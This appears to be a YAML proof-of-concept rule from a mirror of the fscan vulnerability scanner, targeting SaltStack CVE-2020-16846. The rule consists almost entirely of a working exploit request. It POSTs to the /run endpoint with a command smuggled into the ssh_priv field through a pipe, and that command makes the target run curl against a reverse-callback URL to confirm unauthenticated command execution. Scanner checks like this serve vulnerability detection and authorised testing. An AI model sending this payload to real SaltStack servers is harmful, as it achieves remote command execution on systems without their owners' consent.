mirror of https://github.com/qwqdanchun/fscan.git
18 lines
471 B
YAML
18 lines
471 B
YAML
name: poc-yaml-saltstack-cve-2020-16846
|
|
set:
|
|
reverse: newReverse()
|
|
reverseURL: reverse.url
|
|
|
|
rules:
|
|
- method: POST
|
|
path: /run
|
|
body: token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b
|
|
expression: |
|
|
reverse.wait(5)
|
|
|
|
detail:
|
|
author: we1x4n(https://we1x4n.com/)
|
|
links:
|
|
- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
|
|
- https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md
|